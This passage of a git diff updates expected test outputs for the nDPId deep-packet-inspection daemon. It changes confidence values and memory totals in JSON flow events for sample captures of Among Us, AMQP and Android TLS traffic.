00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"among_us.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946681200000,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":57,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":57,"pkt_l4_len":23,"thread_ts_msec":946681200000,"pkt":"eJS0JASgYDjgxTWgCABFAAArJhEAAH8RqpAKAAABrGn7qvsEVgcAF2toCAABAIDZAgMGQUFBQUFB"} -00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"among_us.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":200000,"flow_min_l4_payload_len":15,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.105.251.170","src_port":64260,"dst_port":22023,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AmongUs","breed":"Fun","category":"Game"}} -00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"among_us.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":200000,"flow_min_l4_payload_len":15,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.105.251.170","src_port":64260,"dst_port":22023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AmongUs","breed":"Fun","category":"Game"}} +00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"among_us.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":200000,"flow_min_l4_payload_len":15,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.105.251.170","src_port":64260,"dst_port":22023,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AmongUs","breed":"Fun","category":"Game"}} +00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"among_us.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":200000,"flow_min_l4_payload_len":15,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.105.251.170","src_port":64260,"dst_port":22023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AmongUs","breed":"Fun","category":"Game"}} 00550{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"among_us.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":15,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":946681200000} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869472 bytes -~~ total memory freed........: 5869472 bytes -~~ total allocations/frees...: 118115/118115 +~~ total memory allocated....: 6003106 bytes +~~ total memory freed........: 6003106 bytes +~~ total allocations/frees...: 120877/120877 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 455 chars ~~ json string max len.......: 672 chars diff --git a/test/results/amqp.pcap.out b/test/results/amqp.pcap.out index 286fbed05..6130104e6 100644 --- a/test/results/amqp.pcap.out +++ b/test/results/amqp.pcap.out @@ -2,7 +2,7 @@ 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1490904166118} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904166118,"flow_last_seen":1490904166118,"flow_idle_time":7580000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1490904166118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1490904166118,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1490904166118,"pkt":"AAAAAAAAAAAAAAAACABFAABdxi1AAEAGdWt\/AAABfwABAaytFihPdGXjNxAmEoAYAV7\/UQAAAQEICgC+1cIAvtPNAQABAAAAIQA8ACgAAAhjZWxlcnlldhB3b3JrZXIuaGVhcnRiZWF0AM4="} -00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904166118,"flow_last_seen":1490904166118,"flow_idle_time":7580000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1490904166118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} +00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904166118,"flow_last_seen":1490904166118,"flow_idle_time":7580000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1490904166118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1490904166118,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490904166118,"pkt":"AAAAAAAAAAAAAAAACABFAAA0puJAAEAGlN9\/AAEBfwAAARYorK03ECYST3RmDIAQSfD\/KAAAAQEICgC+1cIAvtXC"} 00595{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1490904166119,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":162,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":162,"pkt_l4_len":128,"thread_ts_msec":1490904166119,"pkt":"AAAAAAAAAAAAAAAACABFAACUxi5AAEAGdTN\/AAABfwABAaytFihPdGYMNxAmEoAYAV7\/iAAAAQEICgC+1cIAvtXCAgABAAAAWAA8AAAAAAAAAAABJ\/gAEGFwcGxpY2F0aW9uL2pzb24FdXRmLTgAAAAtCGhvc3RuYW1lUwAAAB9jZWxlcnlAdGVzdC5jb2duaXRvbmV0d29ya3MuY29tAgDO"} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904166119,"flow_last_seen":1490904166119,"flow_idle_time":7580000,"flow_min_l4_payload_len":448,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":448,"flow_avg_l4_payload_len":448,"midstream":1,"thread_ts_msec":1490904166119,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -11,13 +11,13 @@ 01066{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1490904168121,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":514,"pkt_l4_len":480,"thread_ts_msec":1490904168121,"pkt":"AAAAAAAAAAAAAAAACABFAAH0AQVAAEAGOP1\/AAEBfwAAARYorKyekqMfoHNnjIAYAXcA6QAAAQEICgC+17YAvtXCAQADAAAAKQA8ADwBMwAAAAAAAGF3AAhjZWxlcnlldhB3b3JrZXIuaGVhcnRiZWF0zgIAAwAAAFgAPAAAAAAAAAAAASf4ABBhcHBsaWNhdGlvbi9qc29uBXV0Zi04AAAALQhob3N0bmFtZVMAAAAfY2VsZXJ5QHRlc3QuY29nbml0b25ldHdvcmtzLmNvbQIAzgMAAwAAASd7InN3X3N5cyI6ICJMaW51eCIsICJjbG9jayI6IDM5MTcyNywgInRpbWVzdGFtcCI6IDE0OTA5MDQxNjguMTIwNTc2LCAiaG9zdG5hbWUiOiAiY2VsZXJ5QHRlc3QuY29nbml0b25ldHdvcmtzLmNvbSIsICJwaWQiOiAxODk0LCAic3dfdmVyIjogIjMuMS4xOCIsICJ1dGNvZmZzZXQiOiAwLCAibG9hZGF2ZyI6IFswLjc4LCAwLjU2LCAwLjQyXSwgInByb2Nlc3NlZCI6IDExMzk0MiwgImFjdGl2ZSI6IDAsICJmcmVxIjogMi4wLCAidHlwZSI6ICJ3b3JrZXItaGVhcnRiZWF0IiwgInN3X2lkZW50IjogInB5LWNlbGVyeSJ9zg=="} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904169152,"flow_last_seen":1490904169152,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1490904169152,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1490904169152,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1490904169152,"pkt":"AAAAAAAAAAAAAAAACABFAABTPztAAEAG\/Gd\/AAABfwABAayuFiiKm04N2t+K4IAYAV7\/RwAAAQEICgC+2LgAvtO2AQABAAAAFwA8ACgAAAdkZWZhdWx0B3Rhc2tzLiMAzg=="} -00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904169152,"flow_last_seen":1490904169152,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1490904169152,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} +00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904169152,"flow_last_seen":1490904169152,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1490904169152,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1490904169152,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490904169152,"pkt":"AAAAAAAAAAAAAAAACABFAAA01sFAAEAGZQB\/AAEBfwAAARYorK7a34rgiptOLIAQDAj\/KAAAAQEICgC+2LgAvti4"} 00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1490904169152,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1490904169152,"pkt":"AAAAAAAAAAAAAAAACABFAADAPzxAAEAG+\/l\/AAABfwABAayuFiiKm04s2t+K4IAYAV7\/tAAAAQEICgC+2LgAvti4AgABAAAAhAA8AAAAAAAAAAAA7v4AHmFwcGxpY2F0aW9uL3gtcHl0aG9uLXNlcmlhbGl6ZQZiaW5hcnkAAAAAAgAkZjMzYWFlMjctNjlmNC00ZjQ4LWIwYmMtMmVmZGM0NTVjMTI4JGFiZjI3YmI1LTAxNDktM2RiZC1hMmRiLWQzNTcyYzMwOTc5MM4="} -00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490904166119,"flow_last_seen":1490904169156,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":1342,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1490904169156,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} -00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1490904166119,"flow_last_seen":1490904170242,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":3574,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} -00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":108,"flow_first_seen":1490904166118,"flow_last_seen":1490904170243,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":7295,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} -00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490904169152,"flow_last_seen":1490904170195,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":2085,"flow_avg_l4_payload_len":69,"midstream":1,"thread_ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} +00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490904166119,"flow_last_seen":1490904169156,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":1342,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1490904169156,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} +00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1490904166119,"flow_last_seen":1490904170242,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":3574,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} +00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":108,"flow_first_seen":1490904166118,"flow_last_seen":1490904170243,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":7295,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} +00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490904169152,"flow_last_seen":1490904170195,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":2085,"flow_avg_l4_payload_len":69,"midstream":1,"thread_ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","packets-captured":160,"packets-processed":160,"total-skipped-flows":0,"total-l4-payload-len":12954,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1490904170243} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 160/160 @@ -27,9 +27,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5882347 bytes -~~ total memory freed........: 5882347 bytes -~~ total allocations/frees...: 118285/118285 +~~ total memory allocated....: 6015981 bytes +~~ total memory freed........: 6015981 bytes +~~ total allocations/frees...: 121047/121047 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 1071 chars diff --git a/test/results/android.pcap.out b/test/results/android.pcap.out index d1e346994..6eb377104 100644 --- a/test/results/android.pcap.out +++ b/test/results/android.pcap.out @@ -2,167 +2,168 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"android.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1582454769772} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454769772,"flow_last_seen":1582454769772,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1582454769772,"l3_proto":"ip4","src_ip":"95.101.24.53","dst_ip":"192.168.2.17","src_port":443,"dst_port":50677,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1582454769772,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1582454769772,"pkt":"xGGLNYKpxiwDYGpkCABFAABMMy4AADUGGCtfZRg1wKgCEQG7xfVNnd4qbhnKg4AYAUXNDgAAAQEICmx+XigR4ZkoFwMDABMwxZA0Xbk6ucnG2OFNZYAG8R1y"} -00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454769772,"flow_last_seen":1582454769772,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1582454769772,"l3_proto":"ip4","src_ip":"95.101.24.53","dst_ip":"192.168.2.17","src_port":443,"dst_port":50677,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454769772,"flow_last_seen":1582454769772,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1582454769772,"l3_proto":"ip4","src_ip":"95.101.24.53","dst_ip":"192.168.2.17","src_port":443,"dst_port":50677,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454779631,"flow_last_seen":1582454779631,"flow_idle_time":7580000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1582454779631,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1582454779631,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1582454779631,"pkt":"xGGLNYKpxiwDYGpkCABFAgBirQcAAC4GWpAR+LBLwKgCEQG7xZj0WotEsqX09IAYBCokkgAAAQEIClsVyooR3+x3FwMDACkAAAAAAAAABGgk1MfD1SR1H5v5Q6dSq6XAgQAjDJnQ9jro2uiXnku8Hg=="} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454779631,"flow_last_seen":1582454779631,"flow_idle_time":7580000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1582454779631,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50584,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454779631,"flow_last_seen":1582454779631,"flow_idle_time":7580000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1582454779631,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50584,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1582454779631,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454779631,"pkt":"xGGLNYKpxiwDYGpkCABFAgBTrQgAAC4GWp4R+LBLwKgCEQG7xZj0WotysqX09IAZBCpyhAAAAQEIClsVyooR3+x3FQMDABoAAAAAAAAABZSZBhugqn7IvMs7ScmDJ6yQxA=="} 